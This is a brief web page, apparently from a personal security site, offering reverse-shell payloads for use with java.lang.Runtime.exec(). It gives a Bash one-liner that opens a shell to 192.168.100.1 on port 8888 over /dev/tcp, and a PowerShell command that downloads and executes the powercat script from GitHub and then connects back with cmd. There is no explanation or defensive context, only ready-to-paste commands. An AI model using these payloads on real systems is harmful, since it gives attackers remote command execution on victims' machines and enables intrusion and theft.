d1sbb


Home | Message | Rev Shell | About | Links

Reverse Shell

java.lang.Runtime.exec() Payload

Bash反弹命令:

bash -i >& /dev/tcp/192.168.100.1/8888 0>&1

PowerShell反弹命令:

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.100.1 -p 8888 -e cmd